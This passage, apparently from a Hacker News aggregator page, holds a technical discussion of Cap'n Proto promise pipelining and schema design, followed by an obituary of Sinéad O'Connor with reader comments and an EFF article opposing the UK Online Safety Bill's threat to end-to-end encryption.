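    #   photo = await user_promise.call("get_photo")      # one round trip total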
> I find it surprising how few protocols (besides Cap'n Proto) have promise pipelining.
Pipelining is a bad idea. It reifies object instances, and thus makes robust implementation much harder. You no longer make stateless calls, but you are running functions with particular object instances.
And you immediately start getting problems. Basically, Client Joe calls Service A and then passes the promised result of the call to Service B. So Service B will have to do a remote call to Service A to retrieve the result of the promise.
This creates immediate complications with security boundaries (what is your delegation model?). But what's even worse, it removes the backpressure. Client Joe can make thousands of calls to Service A, and then pass the not-yet-materialized results to Service B. Which will then time out because Service A is being DDoS-ed.
There is also CapnP's moral ancestor CapTP[1]/VatTP aka Pluribus developed to accompany Mark Miller's E language (yes, it's a pun, there is also a gadget called an "unum" in there). For deeper genealogy—including a reference to Barbara Liskov for promise pipelining and a number of other relevant ideas in the CLU extension Argus—see his thesis[2].
(If I'm not misremembering, Mark Miller later wrote the promise proposal for JavaScript, except the planned extension for RPC never materialized and instead we got async/await, which don't seem compatible with pipelining.)
The more recent attempts to make a distributed capability system in the image of E, like Spritely Goblins[3] and the OCapN effort[4], also try for pipelining, so maybe if you hang out on cap-talk[5] you'll hear about a couple of other protocols that do it, if not ones with any real-world usage.
(And I again reiterate that, neat as it is, promise pipelining seems to require programming with actual explicit promises, and at this point it's well-established how gnarly that can get.)
One idea that I find interesting and little-known from the other side—event loops and cooperatively concurrent "active objects"—is "causality IDs"[6] from DCOM/COM+ as a means of controlling reentrancy, see CoGetCurrentLogicalThreadId[7] in the Microsoft documentation and the discussion of CALLTYPE_TOPLEVEL_CALLPENDING in Effective COM[8]—I think they later tried to sell this as a new feature in Win8/UWP's ASTAs[9]?
[1] http://erights.org/elib/distrib/captp/index.html
[2] http://erights.org/talks/thesis/index.html
[3] https://spritely.institute/goblins/
[4] https://github.com/ocapn/ocapn
[5] https://groups.google.com/g/captalk/
[6] https://learn.microsoft.com/openspecs/windows_protocols/ms-d...
[7] https://learn.microsoft.com/windows/win32/api/combaseapi/nf-...
[8] https://archive.org/details/effectivecom50wa00boxd/page/150
[9] https://devblogs.microsoft.com/oldnewthing/20210224-00/?p=10...
As neat as it is, I guess it's hard to optimize the backend for it compared to explicitly grouping the queries. I imagine a bespoke RPC call that results in a single SQL query is better than several pipelined but separate RPC calls, for example.
But even still, you would think it would be more popular.
Redis transactions [1] also apply pipelining, but AFAICT there is no practical way to use them for implementing generic RPC.
[1] https://redis.com/ebook/part-2-core-concepts/chapter-4-keepi...
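For contrast, here is what redis-py's pipelining looks like (assuming the redis package and a local server): commands are batched into one round trip, but a later command cannot consume an earlier command's still-pending result, which is why it doesn't give you generic RPC pipelining:

    import redis  # assumes the redis-py package and a Redis server on localhost

    r = redis.Redis()

    # Batch several commands into a single round trip.
    pipe = r.pipeline(transaction=True)
    pipe.set("user:1:name", "alice")
    pipe.get("user:1:name")
    set_ok, name = pipe.execute()

    # Note the limitation versus promise pipelining: the GET names a fixed key;
    # it cannot take "whatever the previous command produced" as its argument.
    print(set_ok, name)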
Without knowing how exactly capnproto promise pipelining works, when I thought about it, I was concerned about cases like reading a directory and stating everything in it, or getting back two response values and wanting to pass only one to the next call. The latter could be made to work, I guess, but the former depends on eg the number of values in the result list.
I didn't know 9p had promise pipelining!
Or more specifically, it seems to have client-chosen file descriptors, so the client can open a file, then immediately send a read on that file, and if the open fails, the read will also fail (with EBADF). Awesome!
This is great, but 'promise pipelining' also needs support in the client. Are there 9p clients which support promise pipelining? For example, if the user issues several walks, they're all sent before waiting for the reply to the first walk?
Also, it only has promise pipelining for file descriptors. That gives you a lot, definitely, but if for example you wanted to read every file in a directory, you'd want to be able to issue a read and then walk to the result of that read. Which 9p doesn't seem to support. (I actually support this in my own remote syscall protocol library thing, rsyscall :) )
While I never used Cap'n Proto, I want to thank kentonv for the extremely informative FAQ answer [1] on why required fields are problematic in a protocol
I link it to people all the time, especially when they ask why protobuf 3 doesn't have required fields.
[1] https://capnproto.org/faq.html#how-do-i-make-a-field-require...
Avro solves this problem completely, and more elegantly with its schema resolution mechanism. Exchanging schemas at the beginning of a connection handshake is hardly burdensome
Typical provides 'asymmetric' fields to assist with evolution of types:
https://github.com/stepchowfun/typical#asymmetric-fields-can...
>To help you safely add and remove required fields, Typical offers an intermediate state between optional and required: asymmetric. An asymmetric field in a struct is considered required for the writer, but optional for the reader. Unlike optional fields, an asymmetric field can safely be promoted to required and vice versa.
From the FAQ [1]
> The right answer is for applications to do validation as-needed in application-level code.
It would've been nice to include a parameter to switch 'required message validation' on and off, instead of relying on application code. Internally in an application, we can turn this off, the message bus can turn it off, but in general, developers would really benefit from this being on.
[1] https://capnproto.org/faq.html#how-do-i-make-a-field-require...
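One way to read "validation as-needed in application-level code" is a small check at the API boundary that each consumer can opt into or skip; the field names below are hypothetical:

    # Enforce "required" fields in application code at the point of use,
    # instead of baking them into the wire schema. Field names are hypothetical.

    class MissingFieldError(ValueError):
        pass


    def validate_order(msg: dict) -> dict:
        """Check the fields *this* service needs; other readers may need fewer."""
        for field in ("order_id", "customer_id"):
            if not msg.get(field):
                raise MissingFieldError(f"missing required field: {field}")
        return msg


    # An internal hop that only forwards the message can simply skip the call,
    # which is the "switch it off" behaviour asked for above.
    order = validate_order({"order_id": "o-123", "customer_id": "c-9"})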
This is some very valuable perspective. Personally, I previously also struggled to understand why. For me, the thing that clicked was to understand protobuf and Cap'n Proto as serialization formats that need to work across API boundaries and need to work with different versions of their schema in a backwards- and forwards-compatible way; do not treat them as in-memory data structures that represent the world from the perspective of a single process running a single version with no compatibility concerns. Thus, the widely repeated mantra of 'making illegal states unrepresentable' does not apply.
Can't we extend this argument to eliminating basically all static typing? And frankly that'd not even be wrong, and is why Alan Kay defined OOP as one that's dynamically typed and late bound, and we went against it anyway to keep relearning the same lessons over and over.
Very good point.
A gotcha along the same path: generated clients deserialize things you don't even need. It's an aspect of interfaces in Go I really like: remotely type only what I use and skip the rest. It's not fun to have incidents caused by changes to a contract that isn't even used by a service, and those are also hard to find.
That FAQ answer has a very nice parallel with Hickey's video of a similar topic: https://m.youtube.com/watch?v=YR5WdGrpoug&feature=youtu.be
Congrats on the release! It must be very exciting after 10 years :)
If you don't mind the question: will there be more work on implementations for other languages in the future? I really like the idea of the format, but the main languages in our stack aren't supported in a way I'd use in a product.
This is indeed the main weakness of Cap'n Proto. I only really maintain the C++ implementation. Other implementations come from various contributors which can lead to varying levels of completeness and quality.
Unfortunately I can't really promise anything new here. My work on Cap'n Proto is driven by the needs of my main project, the Cloudflare Workers runtime, which is primarily C++. We do interact with Go and Rust services, and the respective implementations seem to get the job done there.
Put another way, Cap'n Proto is an open source project, and I hope it is useful to people, but it is not a product I'm trying to sell, so I am not particularly focused on trying to get everyone to adopt it. As always, contributions are welcome.
The one case where I might foresee a big change is if we (Cloudflare) decided to make Cap'n Proto be a public-facing feature of the Workers platform. Then we'd have a direct need to really polish it in many languages. That is certainly something we discuss from time to time but there are no plans at present.
There are people who have tried to write the RPC layer without it simply being a wrapper around the C++ implementation, but it's a LOT of code to rewrite for not a lot of direct benefit.
Feel free to take a crack at it. People would likely be rather cooperative about it. However, know that it's just simply a lot of work.
I always liked the idea of capnp, but it bothers me that what is ultimately a message encoding protocol has an opinion on how I should architect my server.
FWIW, gRPC certainly has this problem too, but it's very clearly distinct from protobuf, although pb has gRPC-related features.
That entanglement makes me lean towards flatbuffers or even protobuf every time I weigh them against capnp, especially since it means that fb and pb have much simpler implementations, and I place great value on simplicity for both security and maintenance reasons.
I think the lack of good third-party language implementations speaks directly to the reasonability of that assessment. It also makes the bus factor and longevity story very poor. Simplicity rules.
Part of the problem with cap'n'proto whenever I've approached it is that not only does it have an opinion on how to architect your server (fine, whatever) but in C++ it ends up shipping with its own very opinionated alternative to the STL ('KJ') and when I played with it some years ago it really ended up getting its fingers everywhere and was hard to work into an existing codebase.
The Rust version also comes with its own normative lifestyle assumptions; many of which make sense in the context of its zero-copy world but still make a lot of things hard to express, and the documentation was hard to parse.
I tend to reach for flatbuffers instead, for this reason alone.
Still I think someday I hope to have need and use for cap'n'proto; or at least finish one of several hobby projects I've forked off to try to use it over the years. There's some high quality engineering there.
653 points 6 days ago by jbegley in 53rd position
www.irishtimes.com | Estimated reading time – 10 minutes | comments | anchor
Irish singer Sinéad O'Connor has died at the age of 56, her family has announced.
In a statement, the singer's family said: "It is with great sadness that we announce the passing of our beloved Sinéad. Her family and friends are devastated and have requested privacy at this very difficult time."
The acclaimed Dublin performer released 10 studio albums, while her song Nothing Compares 2 U was named the number one world single in 1990 by the Billboard Music Awards. Her version of the ballad, written by musician Prince, topped the charts around the globe and earned her three Grammy nominations.
The accompanying music video, directed by English filmmaker John Maybury, consisted mostly of a close-up of O'Connor's face as she sang the lyrics, and became as famous as her recording of the song.
In 1991, O'Connor was named artist of the year by Rolling Stone magazine on the back of the song's success.
O'Connor was presented with the inaugural award for Classic Irish Album at the RTÉ Choice Music Awards earlier this year.
Sinéad O'Connor receives the Classic Irish Album award for I Do Not Want What I Haven't Got at the RTÉ Choice Music Prize at Vicar Street on March 9th. Photograph: Kieran Frost/Redferns
The singer received a standing ovation as she dedicated the award for the album, I Do Not Want What I Haven't Got, to "each and every member of Ireland's refugee community".
"You're very welcome in Ireland. I love you very much and I wish you happiness," she said.
President Michael D Higgins led the tributes to O'Connor, saying his "first reaction on hearing the news of Sinéad's loss was to remember her extraordinarily beautiful, unique voice".
"To those of us who had the privilege of knowing her, one couldn't but always be struck by the depth of her fearless commitment to the important issues which she brought to public attention, no matter how uncomfortable those truths may have been," he said.
[ Sinéad O'Connor on her teenage years: 'I steal everything. I'm not a nice person. I'm trouble' ]
"What Ireland has lost at such a relatively young age is one of our greatest and most gifted composers, songwriters and performers of recent decades, one who had a unique talent and extraordinary connection with her audience, all of whom held such love and warmth for her ... May her spirit find the peace she sought in so many different ways."
Taoiseach Leo Varadkar expressed his sorrow at the death of the singer in a post on social media. "Her music was loved around the world and her talent was unmatched and beyond compare. Condolences to her family, her friends and all who loved her music," said Mr Varadkar.
Tánaiste Micheál Martin said he was "devastated" to learn of her death. "One of our greatest musical icons, and someone deeply loved by the people of Ireland, and beyond. Our hearts goes out to her children, her family, friends and all who knew and loved her," he said.
Minister for Culture and Arts Catherine Martin said she was "so sorry" that the "immensely talented" O'Connor had died.
"Her unique voice and innate musicality was incredibly special ... My thoughts are with her family and all who are heartbroken on hearing this news Ní bheidh a leithéid arís ann."
Sinn Féin vice president Michelle O'Neill said Ireland had lost "one of our most powerful and successful singer, songwriter and female artists".
"A big loss not least to her family & friends, but all her many followers across the world."
O'Connor drew controversy and divided opinion during her long career in music and time in public life.
In 1992, she tore up a photograph of Pope John Paul II on US television programme Saturday Night Live in an act of protest against child sex abuse in the Catholic Church.
Sinéad O'Connor tears up a photo of Pope John Paul II during a live appearance in New York on NBC's Saturday Night Live on October 5th,1992. Photograph: NBC-TV/AP
"I'm not sorry I did it. It was brilliant," she later said of her protest. "But it was very traumatising," she added. "It was open season on treating me like a crazy bitch."
The year before that high-profile protest, she boycotted the Grammy Awards, the music industry's answer to the Oscars, saying she did not want "to be part of a world that measures artistic ability by material success".
She refused the playing of US national anthem before her concerts, drawing further public scorn.
In more recent years, O'Connor became better known for her spiritualism and activism, and spoke publicly about her mental health struggles.
In 2007, O'Connor told US talkshow Oprah Winfrey that she had been diagnosed with bipolar disorder four years previously and that before her diagnosis she had struggled with thoughts of suicide and overwhelming fear.
She said at the time that medication had helped her find more balance, but "it's a work in progress". O'Connor had also voiced support for other young women performers facing intense public scrutiny, including Britney Spears and Miley Cyrus.
O'Connor, who married four times, was ordained a priest in the Latin Tridentine church, an independent Catholic church not in communion with Rome, in 1999.
The singer converted to Islam in 2018 and changed her name to Shuhada Sadaqat, though continued to perform under the name Sinéad O'Connor. In 2021, O'Connor released a memoir Rememberings, while last year a film on her life was directed by Kathryn Ferguson.
On July 12th, O'Connor posted on her official Facebook page that she had moved back to London, was finishing an album and planned to release it early next year. She said she intended to tour Australia and New Zealand towards the end of 2024 followed by Europe, the United States and other locations in early 2025.
The circumstances of her death remain unclear.
O'Connor is survived by her three children. Her son, Shane, died last year aged 17.
Former Late Late Show host Ryan Tubridy said he was "devastated" by the news of O'Connor's death.
"We spoke days ago and she was as kind, powerful, passionate, determined and decent as ever," he said in a post on Instagram.
Addressing O'Connor directly, he said: "Rest in peace Sinéad, you were ahead of your time and deserve whatever peace comes your way."
Broadcaster Dave Fanning said O'Connor would be remembered for her music and her "fearlessness" and "in terms of how she went out there all the time, believed in everything she was doing, wasn't always right and had absolutely no regrets at all".
Canadian rock star Bryan Adams said he loved working with the Irish singer. "I loved working with you making photos, doing gigs in Ireland together and chats, all my love to your family," he tweeted.
REM singer Michael Stipe said: "There are no words," on his Instagram account alongside a photograph he posted of himself with O'Connor.
Hollywood star Russell Crowe posted a story on Twitter recounting a chance meeting with O'Connor – whom he described as "a hero of mine" – outside a pub in Dalkey, south Dublin, while he was working in Ireland last year.
"What an amazing woman. Peace be with your courageous heart Sinéad," he tweeted.
Billy Corgan, lead singer of American rock band The Smashing Pumpkins, said O'Connor was "fiercely honest and sweet and funny".
"She was talented in ways I'm not sure she completely understood," he said.
Ian Brown of The Stone Roses tweeted: "RIP SINEAD O'CONNOR A Beautiful Soul. Hearin Collaborating with and hearing Sinead sing my songs in the studio in Dublin was magical and a highlight of my musical life."
Musician Tim Burgess of the Charlatans said: "Sinead was the true embodiment of a punk spirit. She did not compromise and that made her life more of a struggle. Hoping that she has found peace."
American rapper and actor Ice T paid tribute to O'Connor, saying she "stood for something". In a Twitter post, he wrote: "Respect to Sinead ... She stood for something ... Unlike most people ... Rest Easy".
The Irish Music Rights Organisation (IMRO) said: "Our hearts go out to family, friends, and all who were moved by her music, as we reflect on the profound impact she made on the world."
Irish band Aslan paid tribute to O'Connor – both originating from Dublin. O'Connor collaborated with the band on Up In Arms in 2001.
Aslan lead singer Christy Dignam died in June.
A post on the band's Facebook page read: "Two Legends taken from us so closely together... No words ... Rest in Peace Sinead".
British singer Alison Moyet said O'Connor had a voice that "cracked stone with force by increment". In a post on Twitter, she wrote: "Heavy hearted at the loss of Sinead O'Connor. Wanted to reach out to her often but didn't. I remember her launch. Astounding presence. Voice that cracked stone with force & by increment.
"As beautiful as any girl around & never traded on that card. I loved that about her. Iconoclast."
US film and TV composer Bear McCreary reflected on writing new songs with the "wise and visionary" Sinead O'Connor in a social media post. McCreary tweeted that he was "gutted".
"She was the warrior poet I expected her to be — wise and visionary, but also hilarious. She and I laughed a lot. We were writing new songs together, which will now never be complete. We've all lost an icon. I've lost a friend. #RIP."
The pair had worked together on the latest version of the theme for Outlander.
Her performance on SNL was a sign-act (prophetic gesture) in the purest sense of the word.
There are a number of flagged comments which don't deserve it. And as long as there is no outlet for objecting to poor flagging decisions, I'll use the comments section to call attention to it.
If we are going to have a discussion about a performer unafraid of controversy and who struggled with mental and spiritual concerns publicly, a robust conversation should be allowed.
The flagged comments I'm aware of are either taking the thread into flamewar, and/or on generic tangents. Those are correct uses of flags. If there's something I've missed about this, I'm happy to take a look, but I'd need a specific link.
'Robust' can mean a lot of things. HN's intended purpose is curious conversation. If we allow the predictably-outraged type of thread here, it will quickly take over discussion of most stories. If that happens, it will quickly destroy the forum. This is not a small risk—it's the biggest one. It would be foolish not to take it seriously, and we work hard to prevent it.
Ironically, that sometimes leads to the perception that the forum is fine, so why not allow a few robust fires to burn here and there? The answer is that the forum is not fine. It's at constant risk of burning to a crisp [1], and our primary responsibility is to stave that off [2], to the extent that we can.
That said, if there's truly high-quality conversation going on in any of these flagged subthreads, I'd like to see it. My experience in general is that flamewar doesn't go along with high-quality conversation at all. It's extremely exciting, of course—but from an intellectual-curiosity point of view, inert and boring, as anything predictable is [3].
https://news.ycombinator.com/newsguidelines.html
[1] https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...
[2] https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...
[3] https://hn.algolia.com/?dateRange=all&page=0&prefix=false&so...
The irony of being outlived by Shane MacGowan.
He has outlived Kirsty MacColl (co-singer on Fairytale of New York) by 23 years and counting. Her death was a tragedy.
I remember being outraged at her tearing up John Paul II's picture. The media in the U.S. did a great job of hiding why she did it. I was not outraged at her when I found out her justified reasons for doing so. That was the first time I became consciously aware that news is a business and that that business thrives when it generates outrage. I no longer fall victim to this.
She's far more the saint than that bastard John Paul II.
EDIT: Ironic this is flagged. I'm proud of this actually. I feel a slight kinship with Sinead now. In honor of her death would that we all, in our own way, tear to shreds the image of John Paul II!
Same.
As a child, I thought the Pope and the church helped poor people and practiced showing people how to be good to each other by following the ten commandments. When Sinead O Connor ripped up the picture of the Pope on SNL I remember asking why.
Someone said the reason was because she was crazy. They were lying to me.
Sinead O'Connor was drawing attention to child sexual abuse when nobody else was.
> She's far more the saint than that bastard John Paul II.
I don't know about JP2's involvement in child sexual abuse (not doubting you, just saying I don't know *) but Ratzinger / Benedict absolutely deliberately prevented investigation into, and facilitated (by moving rapist priests into new parishes), child sexual abuse.
Years later I apologized to O'Connor on Twitter and she took it with grace.
* Update: some research showed the Vatican, under JP2, opposed extensions of the statutes of limitations in sex abuse cases.
Do you not think your comment would have been better without the final sentence?
You started a religious flamewar and then poured fuel into it in multiple places. That's why your comment is flagged. Please don't post like that here.
Your comment was just fine in the first paragraph and broke the site guidelines with the second paragraph—not because we care what you think about popes, but because such swipes predictably lead to internet dreckfests and we're simply trying to have a forum that doesn't suck. At least to the extent possible.
This was arguably one of the first 'cancellations' before 'cancel culture' was a thing we were talking about.
Right or wrong, what she did was definitely courageous and arguably destroyed her career.
I have known about her since Nothing Compares 2 U, but I haven't known that much else about her career since then. I thought she was kind of a one-hit wonder; as talented as she was, she never got another hit close to as successful as that one. Do you think this is an unfair description?
Her goal was not to collect hits, and the one was a fluke that surprised everyone involved. Up to each person to decide how important that is to them, I suppose.
I am deeply saddened by her passing. Her performances always featured powerful vocals driven by equally powerful emotion.
But her version of Pink Floyd's 'Mother,' performed live in Berlin in 1990 with Roger Waters, Rick Danko, Levon Helm, and Garth Hudson, was Sinead at her most vulnerable and in my opinion, a full expression of her soul.
Audio with onstage video: https://www.youtube.com/watch?v=QRbKXACBaoc
High quality audio only: https://www.youtube.com/watch?v=LSd0Yl5mDuU
Trivia: Those recordings of her are mostly from the dress rehearsal the night before. They had power issues during her live performance and she refused to come back onstage after the show to record another take. So the concert-goers didn't get to hear this version.
I was in Berlin a few days before and went to the best concert I've ever attended. It was a double header, Sinead and Midnight Oil - it was just her and a tape deck, and absolutely brilliant.
My favourite song too, heartbreaking knowing the abuse she suffered at the hands of her own mother.
I always had immense respect for her decision to shave her head when told by music execs to 'sex it up.' She was gorgeous but she was a singer. She wanted to be hired for her singing.
Being a pretty young woman shouldn't be such a ridiculous hardship. And I kind of wonder how much that radicalized her and how that factors into her conversion to Islam.
Perhaps that was her reasoning, but it turned out to be a highly marketable look which would not have worked for someone without such a beautiful, feminine facial structure.
What I respect her for is having the balls to make a political statement about Catholic child abuse when the topic was far, far outside the Overton window. That was a career sacrifice, and years later she turned out to be right.
This comment seems offensive and feels like you associating radicalization with Islam
Wow, I always liked Sinead and her music but didn't realize that was the reason for her haircut. Big up to her.
on Twitter in November 2018. She wrote: 'What I'm about to say is something so racist I never thought my soul could ever feel it. But truly I never wanna spend time with white people again (if that's what non-muslims are called). Not for one moment, for any reason. They are disgusting.'
https://en.wikipedia.org/wiki/Sin%C3%A9ad_O%27Connor#Tweets_...
Why not include the whole text though?
> Later that month, O'Connor stated that her remarks were made in an attempt to force Twitter to close down her account.[99] In September 2019, she apologised for the remarks, saying 'They were not true at the time and they are not true now. I was triggered as a result of Islamophobia dumped on me. I apologize for hurt caused. That was one of many crazy tweets lord knows.'
It's a shitty thing to write but she's also someone who had very openly struggled with poor mental health for basically all of her life. I've a hard time holding something as thoughtless - in a very literal sense - as that against her.
She never deserved to be shunned.
Even if you strongly agree with her criticism of the pope, the way that she expressed that criticism -- by deceiving everyone on SNL to pull off her stunt -- certainly branded her as a loose cannon in the industry. Unpredictability might entertain audiences, but it's a huge liability from an entertainment industry perspective.
And arguably, her antics greatly overshadowed the message she was trying to get across. How many people even realized what she was criticizing? So it ended up pissing off a lot of people without actually being effective in drawing attention to the issue she wanted to raise awareness toward.
Looking back 30 years later, it's really hard to understand. If it was today, it would barely be a blip.
It's hard not to laugh whenever people talk about 'cancel culture' being a new phenomenon. The amount of hate she received for merely bringing up the horrible actions the catholic church committed was absurd.
'We belong to Allah, and to Him we return.'[1]
[1] Inna Lillahi wa inna ilayhi raji'un:
https://en.wikipedia.org/wiki/Inna_Lillahi_wa_inna_ilayhi_ra...
We belong to ourselves, and only the weak-minded allow themselves to become enslaved by another. Free yourself.
> She refused the playing of US national anthem before her concerts, drawing further public scorn.
Was this a thing?!
A good episode of 'You're Wrong About...' covers the controversy of her:
https://open.spotify.com/episode/265qKOV5C7XBqlyXMjp7VF
https://podcasts.apple.com/at/podcast/sin%C3%A9ad-oconnor-wi...
I used to refuse to stand for the pledge of allegiance in high school and get threatened with being beat up, I guess it was a thing at the time.
Perhaps it was only a thing at the Garden State Arts Center (now the PNC Bank Arts Center)? Here's a Washington Post story at the time: https://www.washingtonpost.com/archive/lifestyle/1990/08/28/...
The Garden State Arts Center, which always starts its shows by playing the anthem, gave in to the singer's demand, fearing that a last-minute cancellation would enrage the audience of 9,000, but prohibited any future appearances by the hit singer.
The first time I heard the song -- and saw the video -- to 'Nothing Compares 2 U' and the screen is nothing but her face and at one point there are tears, and she blares that unreal voice, I think I stopped breathing.
She will be missed.
At the risk of being obvious, see also Dreyer's 1928 La Passion de Jeanne d'Arc (https://vimeo.com/169369684).
She had the same intent look in this recording of Molly Malone: https://www.youtube.com/watch?v=3ouqhCtIh2g
Nothing Compares 2 U reliably induces frisson/goosebumps in me. Rare that a cover can match a Prince original: https://en.wikipedia.org/wiki/Nothing_Compares_2_U
What a legend. It's hard to overstate how much pushback and shit was thrown at her when she ripped up a picture of the Pope on SNL in 1992 to protest church child abuse. It's also hard to overstate how incredibly prescient and correct she was in her outrage. Catholic church child sex abuse didn't really enter the national debate until a decade later.
Willingly and knowingly threw away a promising mainstream pop career to make that statement. Eternal respect.
I was growing up in Poland at the height of the John Paul II cult. I was raised in an atheist family and I was getting some tidbits about my grandfather's brother, who was sexually assaulted by a priest.
Today it sounds a little bit silly but that SNL performance was the validation I needed to navigate my environment outside my home.
Now I learned a lot about issues in Catholic Church and I understand this stuff better but I'll be forever grateful for this small gesture of solidarity. Even if it wasn't directed at me.
It doesn't sound silly at all to me. I was also raised atheistically, but in a fiercely Catholic family in Ireland. I never saw this at the time, but I knew it happened.
To my shame, I thought she was uncool for years after. I think I picked it up from others at the time (I was in a Catholic primary school).
Ironically, even though it was apparently common knowledge amongst my Catholic country- and family-members, it took years for me to believe that that kind of systematic abuse could have happened. I have dedicated a part of my resources and efforts to eradicating the Catholic church and other radical religions from my country.
Archbishop Wojtyła helped overthrow the communist regime in the Polish People's Republic, which had caused significant hardship among Polish people.
Her first recorded song was with The Edge on the criminally overlooked soundtrack for 'Captive': https://www.youtube.com/watch?v=BvKV4_9nV2M
[flagged]
Please don't take HN threads into religious flamewar. That's a circle of hell we're trying our best to avoid here.
Geez, only 56 years old. Seems like a lot of Gen X artists are passing away much earlier than the generation before them.
https://en.wikipedia.org/wiki/27_Club
The 27 Club is an informal list consisting mostly of popular musicians, artists, actors, and other celebrities who died at age 27.
Brian Jones, Jimi Hendrix, Janis Joplin, and Jim Morrison all died at the age of 27 between 1969 and 1971. At the time, the coincidence gave rise to some comment, but it was not until Kurt Cobain's 1994 suicide, at age 27, that the idea of a '27 Club' began to catch on in public perception.
What how, she is so young. That is super sad.
She lost her son of 17 years only 5 months ago. With no additional details, I know where my mind goes.
Edit: whatever article I read said 5 months ago, but that appears to have been written some time ago. Plenty of articles stating that Shane died in Jan/2022:
https://duckduckgo.com/?t=ffab&q=shane+oconnor+wikipedia&ia=...
Announcing her conversion, she said, 'This is to announce that I am proud to have become a Muslim. This is the natural conclusion of any intelligent theologian's journey. All scripture study leads to Islam. Which makes all other scriptures redundant.'
That sort of phrasing is almost to be expected, no? This might just be a cynical atheist's interpretation of Abrahamic religions, but Islam seems to be loosely doing the same thing to Christianity that Christianity did to Judaism, i.e. it purports to be the next theological evolution and therefore all practitioners of {current_religion} should rationally convert and download the latest religious firmware.
I was going to make a joke about how it's a shame they stopped inventing Abrahamic religions, but then I remembered the Mormons! I would like to suggest that Mormonism is the true natural conclusion of any intelligent theologian's journey. At least until someone creates a new Abrahamic religion to succeed it.
This hit me hard. The first of her songs I ever knew, and still my favorite, was 'Troy' and I was just thinking of it this morning. Then an hour later someone tweeted that she had died. Probably going to be sad all day.
What an incredible album. Jackie and Just Call me Joe are songs I always love to hear.
In the Netherlands this was her best-known song. I was a teenager when Troy was a hit on the radio, and the video was intriguing. It hits me too; I feel respect for her, though I sometimes had doubts about some ideas she put forward.
She'll be missed. As a youngster growing up in Ireland she not only gave a voice to all of us who wanted to reject the influence of the church, which had only become more entrenched throughout the conflict, but also to the women of this island who had been previously silenced for centuries.
If anyone is interested more in feminist voices from the conflict in Ireland I can highly recommend the 1981 film Maeve. The idea of women being a 'third side' in the whole conflict who had never been given voice was incredibly eye opening to me as a man moving into my 30s and changed my perspective not only on Irish history but entire history of Europe and the Middle East.
Anything covering the Magdalene laundries or other Catholic institutions in Ireland is pretty relevant too. She did spend a bunch of her childhood in one.
Saw her live in NYC back in 2005 when she was doing roots reggae.
Sly & Robbie was the rhythm section, with Burning Spear on vocals and percussion. Maybe Mikey Chung on guitar?
I was totally surprised at the combination — this Crazy Baldhead amongst Dreads — but one of the best live shows I've been to. Surrounded by reggae icons, she was a boss on that stage.
Big up Sinéad! An incredible musician.
That was likely due to her collaborations with Adrian Sherwood/On-U Sound initially, but she was a long-time admirer of roots and dubwise. The Caribbean influence in UK/Irish pop culture is much stronger than in the US (other than hip hop).
Wow, I had no idea that lineup existed. Just started going down the YouTube rabbit hole. Thank you.
Check out the 'Throw Down Your Arms' album. Not sure why, but it can only be found on YouTube.
https://www.youtube.com/watch?v=GzxTDHMQza8
To stand in the full blast of a crowd that hates you with that amount of poise, and have a voice that is still capable of song or even coherent speech, just beggars my imagination.
i hope you have found peace. you were a voice crying out in the wilderness and we did to you what we always do to that.
I've never seen this before. What an incredibly powerful act, this might have taken so much courage. Thank you for sharing!
Rolling Stone's look back, from 2021:
'Flashback: Sinead O'Connor Gets Booed Offstage at Bob Dylan Anniversary Concert'
<https://www.rollingstone.com/music/music-news/sinead-o-conno...>
Wow! The thing that surprised me most about this was that it's a Bob Dylan tribute concert. I'm shocked religion still had such a hold on the kind of people attending that type of concert at that point in time. The volume is insane. Incredible strength to be able to stand and take such abuse and continue to perform.
Thank you for posting that. Her grace and defiance there were extraordinary. Peace for her.
636 points 4 days ago by pwmtr in 10000th position
www.eff.org | Estimated reading time – 7 minutes | comments | anchor
The U.K. Parliament is pushing ahead with a sprawling internet regulation bill that will, among other things, undermine the privacy of people around the world. The Online Safety Bill, now at the final stage before passage in the House of Lords, gives the British government the ability to force backdoors into messaging services, which will destroy end-to-end encryption. No amendments have been accepted that would mitigate the bill's most dangerous elements.
TELL the U.K. Parliament: Don't Break Encryption
If it passes, the Online Safety Bill will be a huge step backwards for global privacy, and democracy itself. Requiring government-approved software in peoples' messaging services is an awful precedent. If the Online Safety Bill becomes British law, the damage it causes won't stop at the borders of the U.K.
The sprawling bill, which originated in a white paper on "online harms" that's now more than four years old, would be the most wide-ranging internet regulation ever passed. At EFF, we've been clearly speaking about its disastrous effects for more than a year now.
It would require content filtering, as well as age checks to access erotic content. The bill also requires detailed reports about online activity to be sent to the government. Here, we're discussing just one fatally flawed aspect of OSB—how it will break encryption.
It's a basic human right to have a private conversation. To have those rights realized in the digital world, the best technology we have is end-to-end encryption. And it's utterly incompatible with the government-approved message-scanning technology required in the Online Safety Bill.
This is because of something that EFF has been saying for years—there is no backdoor to encryption that only gets used by the "good guys." Undermining encryption, whether by banning it, pressuring companies away from it, or requiring client side scanning, will be a boon to bad actors and authoritarian states.
The U.K. government wants to grant itself the right to scan every message online for content related to child abuse or terrorism—and says it will still, somehow, magically, protect peoples' privacy. That's simply impossible. U.K. civil society groups have condemned the bill, as have technical experts and human rights groups around the world.
The companies that provide encrypted messaging—such as WhatsApp, Signal, and the UK-based Element—have also explained the bill's danger. In an open letter published in April, they explained that OSB "could break end-to-end encryption, opening the door to routine, general and indiscriminate surveillance of personal messages of friends, family members, employees, executives, journalists, human rights activists and even politicians themselves." Apple joined this group in June, stating publicly that the bill threatens encryption and "could put U.K. citizens at greater risk."
In response to this outpouring of resistance, the U.K. government's response has been to wave its hands and deny reality. In a response letter to the House of Lords seen by EFF, the U.K.'s Minister for Culture, Media and Sport simply re-hashes an imaginary world in which messages can be scanned while user privacy is maintained. "We have seen companies develop such solutions for platforms with end-to-end encryption before," the letter states, a reference to client-side scanning. "Ofcom should be able to require" the use of such technologies, and where "off-the-shelf solutions" are not available, "it is right that the Government has led the way in exploring these technologies."
The letter refers to the Safety Tech Challenge Fund, a program in which the U.K. gave small grants to companies to develop software that would allegedly protect user privacy while scanning files. But of course, they couldn't square the circle. The grant winners' descriptions of their own prototypes clearly describe different forms of client-side scanning, in which user files are scoped out with AI before they're allowed to be sent in an encrypted channel.
The Minister completes his response on encryption by writing:
We expect the industry to use its extensive expertise and resources to innovate and build robust solutions for individual platforms/services that ensure both privacy and child safety by preventing child abuse content from being freely shared on public and private channels.
This is just repeating a fallacy that we've heard for years: that if tech companies can't create a backdoor that magically defends users, they must simply "nerd harder."
